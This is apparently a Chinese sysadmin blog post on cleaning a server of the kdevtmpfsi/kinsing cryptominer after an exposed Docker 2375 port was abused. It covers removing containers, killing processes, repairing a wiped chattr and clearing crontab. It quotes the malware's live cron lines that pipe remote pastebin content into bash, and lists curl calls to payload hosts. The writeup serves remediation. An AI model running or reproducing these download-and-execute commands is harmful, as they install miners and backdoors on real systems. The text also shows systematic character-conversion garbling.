linux 病毒 自动写crontab,记一次挖矿病毒kdevtmpfsi，xmrig，定时任务crontab不能更改，及莫名的curl，致使CPU太高，占用网络链接数过大的解决办法...

1、警告html

1、警告

在linux中使用docker，redis,ssh，tomcat等 的时候，建议所有更改为本身自定义的端口，开启防火墙并开发本身须要的端口。ssh

2、解决病毒

1.docker 引起的挖矿程序的惨案

发现linux系统中使用的docker自动建立了一些镜像，而且自动建立了不少容器。

docker ps

查看多了一些不是工做人员建立的容器

9123b9382935        felilca/ubuntu:latest   "/root/startup.sh"       3 hours ago         Created          adoring_poincare

020474fba957        felilca/ubuntu:latest   "/root/startup.sh"       3 hours ago         Created          festive_tharp

e29eab638235        felilca/ubuntu:latest   "/root/startup.sh"       3 hours ago         Created         serene_lichterman

286f88317d0a        felilca/ubuntu:latest   "/root/startup.sh"       3 hours ago         Created          confident_ptolemy

f40496ce7392        felilca/ubuntu:latest   "/root/startup.sh"       3 hours ago         Created           inspiring_haibt

def4365fc121        felilca/ubuntu:latest   "/root/startup.sh"       3 hours ago         Created            adoring_leavitt

文字方便你们搜索

docker images

发现多了metal3d/xmrig，ubuntu，greekgoods/kimura，felilca/ubuntu等不是咱们工做人员本身下载的镜像。

(1)病毒缘由

工做人员为了方便开发时部署，把docker的2375端口打开，而且没有设置安全加固方式；

具体的缘由能够参考下面篇文章：

(2)解决病毒

1.首先先查看linux服务器防火墙是否开启： firewall-cmd --state

若是没有开启，请开启，不想开启的话，安全性本身评估

若是防火墙在开启状态，执行下一步

2.查看防火墙开放的端口，并把docker的2375端口进行关闭。(若是病毒是经过redis等方式侵入，可执行相同的步骤，但

是要记得变换端口号)

firewall-cmd --zone=public --remove-port=2375/tcp --permanent

3.端口号关闭以后，进行执行删除docker容器和镜像命令。

1.docker stop $CONTAINER_ID               (有多个容器的话，可在后面$CONTAINER_ID拼接，中间加空格)

2.docker rm $CONTAINER_ID

容器删除干净以后，删除不须要的镜像

3.docker rmi $IMAGES_ID                         (有多个镜像的话，可在后面$IMAGES_ID拼接，中间加空格)

4.杀掉病毒进程

[root@localhost ]# ps -aux | grep kinsing

root 20296 0.0 0.6 119428 50140 ? Sl Mar31 0:01 /var/tmp/kinsing

root 22217 0.0 0.0 118908 984 pts/8 S+ Mar31 0:00 grep --color=auto kinsing

[root@localhost]# ps -aux | grep kdevtmpfsi

root 21476 83.2 0.0 2721344 1484 ? Ssl Mar31 27:47 /tmp/kdevtmpfsi

root 22920 0.0 0.0 118908 988 pts/8 S+ Mar31 0:00 grep --color=auto kdevtmpfsi

[root@localhost ]# kill -9 20296

[root@localhost ]# kill -9 21476

而后删除病毒相关文件

[root@localhost ]# rm -rf /tmp/kdevtmpfsi

[root@localhost ]# rm -rf /var/tmp/kinsing

最后本身能够再检查一下是否还有kdevtmpfsi的相关文件，有的话就继续删除

[root@localhost ]# find / -name kdevtmpfsi

[root@localhost ]# find / -name kinsing

2.定时任务crontab不能更改

说到这个，我就想笑，病毒仍是很狡猾的。

(1)查看定时任务

crontab -l

结果为：

*/7 * * * * curl -A fczyo-cron/1.6 -sL $(curl -sL https://anonpasta.rocks/raw/nofoletove) | bash -s >/dev/null 2>&1

*/10 * * * * curl -A fczyo-cron/1.6 -sL $(curl -sL https://anonpasta.rocks/raw/imusacubix) | bash -s >/dev/null 2>&1

*/3 * * * * curl -A goodboy/1.5 -sL https://iplogger.org/1i9ve7

*/2 * * * * curl -A fczyo-cron/1.6 -sL $(curl -sL https://anonpasta.rocks/raw/atucewakep) | bash -s >/dev/null 2>&1

(2)删除定时任务

在我去删除定时任务的时候，发现，病毒把定时任务的文件/var/spool/cron/root更改为了只读状态

查看/var/spool/cron/root文件状态： lsattr /var/spool/cron/root

结果为：   ----ia----------- /var/spool/cron/root

(3)更改定时任务属性文件状态(新状况)

执行：chattr -ia /var/spool/cron/root

发现：-bash: /usr/bin/chattr: Permission denied

这是什么状况，chattr命令不能使用，接着查看chattr的状况

执行：ls -l /usr/bin/chattr

发现：-rw-r--r-- 1 root root 0 Apr 13 23:30 /usr/bin/chattr

这是没有执行权限啊，接下来给chattr添加上执行权限

执行：chmod u+x /usr/bin/chattr

添加过以后，再执行 ls -l /usr/bin/chattr，而后查看一下chattr的权限，正常加上去了

执行：chattr -ia /var/spool/cron/root ，返回成功

执行：lsattr/var/spool/cron/root

发现： ----ia----------- /var/spool/cron/root ia权限仍是存在，这是怎么回事？？？？？？

仔细看下：

执行：ls -l /usr/bin/chattr

返回：-rwxr-xr-x 1 root root 0 Apr 13 23:30 /usr/bin/chattr

哈哈哈：万恶的病毒把chattr的文件内容所有清空了

从另一台虚拟机上把 /usr/bin/chattr 文件传给这台linux机器吧

而后，执行chattr -ia /var/spool/cron/root ，返回成功

执行：lsattr/var/spool/cron/root

发现： ----------------- /var/spool/cron/root 文件已然正常

==================================================================================

执行：crontab -e 删除掉里面的定时任务，保存，退出

而后给 /var/spool/cron/root 文件添加上只读属性。

完成。

3.更改ssh端口

ssh链接只开放一个自定义端口便可，开放过自定义端口以后，建议把22端口给关掉，

主要就是更改一下：/etc/ssh/sshd_config

4.莫名的curl，致使CPU太高

使用top命令查看，发现一些莫名的curl访问

执行top命令以后，展现的几条异常curl

[root@localhost tmp]# ps -aux | grep curl

root 23431 1.6 0.0 274520 7416 pts/7 S+ Mar31 0:00 curl -sL https://cdn-09.letsupload.cc/B1S4M1D7n9/16c8b421-1586789407/microsoft

root 23484 2.0 0.0 274520 7420 pts/5 S+ Mar31 0:00 curl -sL https://cdn-25.letsupload.cc/B1S4M1D7n9/16c8b421-1586789407/microsoft

root 23554 0.0 0.0 118904 976 pts/8 S+ Mar31 0:00 grep --color=auto curl

root 23583 7.0 0.0 274492 7100 pts/1 S+ Mar31 0:00 curl -sL https://cdn-07.letsupload.cc/3eS7MaDcn6/f3ebe80d-1586789364/google.jpg

root 23612 1.0 0.0 260860 3284 pts/3 S+ Mar31 0:00 curl -sL https://cdn-17.letsupload.cc/J2S1MaDbn9/50934c28-1586789397/ovh.jpg

root 23615 0.0 0.0 260860 3284 pts/4 S+ Mar31 0:00 curl -sL https://cdn-12.letsupload.cc/r6SdMfD8n5/b4029c4c-1586789429/cn.jpg

root 23624 1.0 0.0 268544 4152 pts/2 R+ Mar31 0:00 curl -sL https://cdn-24.letsupload.cc/lbS4M5Dbn2/d5ad92b7-1586789411/amazon.jpg

root 23632 0.0 0.0 260860 3284 pts/6 S+ Mar31 0:00 curl -sL https://cdn-23.letsupload.cc/v6S5M6D4n8/b6c59036-1586789420/de

发现有好多个伪终端在链接(pts/0、一、二、3...)

在linux执行w命令，查看当前链接的终端，发现只有其中两个是工做人员的，其他的全是非法链接。直接使用root用户权限，强制踢出非法链接的： pkill -kill -t pts/一、pkill -kill -t pts/二、pkill -kill -t pts/三、........

3、完成

.ssh链接端口已更改；

docker2375端口已关闭(或者使用安全加固)，安全加固方式可参考生成CA证书进行访问，官方生成CA证书；

docker非法镜像及容器已删除；

定时任务已删除；

非法链接伪终端已剔除。